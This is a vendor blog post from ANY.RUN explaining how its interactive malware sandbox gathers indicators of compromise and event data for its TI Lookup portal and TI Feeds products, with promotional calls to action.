At ANY.RUN, we’ve been developing our interactive online malware sandbox since 2016. Today, 400,000 security professionals use it to detonate files, analyze threats, and inspect phishing sites.
This gives us a unique perspective — and our key advantage: we’ve built a database that contains event’s fields and IOCs with connections between all artifacts within a single analysis session. In October 2022, aiming to give our users a more powerful way to use this data, we launched TI Threat Intelligence Feeds, followed by the TI Lookup portal, which we shipped in February.
Read how we developed TI Lookup.
In this article, we’ll explain how these products can help you expand threat coverage or identify threats from isolated indicators — which no other security solution on the market might have access to.
How ANY.RUN processes indicators
Our sandbox is interactive. This means malware actually executes within it, running through different stages, fetching payloads and encrypting files or stealing data. If it doesn’t self-execute, the analyst can manually trigger it through actions like entering a password in a locked .ZIP archive or solving a CAPTCHA on a phishing site to trigger download of a second-stage payload.
This allows us to capture a holistic picture of indicators within each analysis session. We extract them from:
- Memory (memory dumps, static analysis)
- Traffic between the malware and C2 server
- MITRE ATT&CK tactics, techniques, and procedures
In addition to indicators, we collect associated event fields like Command Line, File Name, Registry Name, Registry Value, Injection Flags, HTTP Response Content, Image Path – around 30 fields in total. (See the full list here)
Learn how ANY.RUN products can help your security team
Schedule a demoWhere our IOCs come from
The IOCs you can receive through Feeds or search for in the Lookup portal come from public sandbox research sessions — ANY.RUN sandbox receives around 14,000 daily, submitted by analysts from over 100 countries. Here’s how it works:
Let’s say an analyst in the UK notices something suspicious in their SIEM logs or receives a request to inspect a strange email link. They upload the file to our sandbox and configure a regional network environment using a residential proxy.
They then perform an interactive analysis session, allowing the sample to fully execute. We capture all processes, events, and extract hashes, domains, IPs, and URLs from this analysis task. Sessions can last up to 1,200 seconds as analysts conduct thorough investigations.
This is how we obtain data on the latest malware threats from around the globe. In total, our threat database stores 24TB of such data.
How to use ANY.RUN threat intelligence for your advantage
You can leverage our data in two main ways:
- In TI Lookup: Use our portal to search for related events across 30 parameters. Search by substrings using wildcards (*) or broadly. Our search is extremely fast, with results typically appearing within 5 seconds. You receive not only connected IOCs and event fields, but also linked sandbox research sessions where they were recorded.
- In TI Feeds: Pull the data in STIX format from our Feeds directly into your TIP and SIEM systems. Then configure your firewalls against the latest threats. New data arrives every 2 hours, providing not just indicators but associated event fields for full context.
In addition, we have our own team of analysts who proactively research threats, conduct investigations, and add new detections.
Wrapping up
By integrating our TI Feeds and Lookup portal, you’ll gain access to a continuously updated database of malware intelligence before it hits other sources. Leverage data from over 1.5 million interactive research sessions — from our community and an in-house team of analysts — to strengthen your security posture.
Integrate our solutions to:
- Gain access to the latest malware data which reaches us first —from the community and our in-house analyst team.
- Search across any event’s field from 1.5 million interactive investigations over the past 6 months.
- Identify threats not just by IOCs, but by their actions within systems — command lines, registry modifications, memory dumbs, unencrypted traffic, and encrypted traffic, and more.
What is ANY.RUN?
ANY.RUN’s most well-known product is an interactive malware sandbox that helps security teams analyze malware quickly and efficiently. Every day, 400,000 professionals use our platform to investigate incidents and streamline threat analysis on Windows and Linux VMs in the cloud.
Integrate ANY.RUN TI products in your organization
Contact SalesWe’re well known for:
- Real-time detection: Within roughly 40 seconds of uploading a file, ANY.RUN can detect malware and automatically identify many malware families using YARA and Suricata rules.
- Interactive analysis: Unlike many automated solutions, ANY.RUN allows you to interactively engage with the virtual machine directly through your browser. This interactive capability helps prevent zero-day exploits and sophisticated malware that can evade signature-based detection.
- Cost-efficiency: For businesses, ANY.RUN’s cloud nature translates into a cost-effective solution, as it doesn’t require any setup or maintenance effort from your DevOps team.
- Helping with onboarding new security team members: ANY.RUN’s intuitive interface allows even junior SOC analysts to quickly learn how to analyze malware and extract indicators of compromise IOCs.
If these capabilities sound beneficial for you or your team, give ANY.RUN a try. The best part is — we offer a completely free starter plan.
The post How We Process IOCs for ANY.RUN Threat Intelligence Lookup and Feeds appeared first on ANY.RUN's Cybersecurity Blog.
Article Link: https://any.run/cybersecurity-blog/how-we-process-iocs/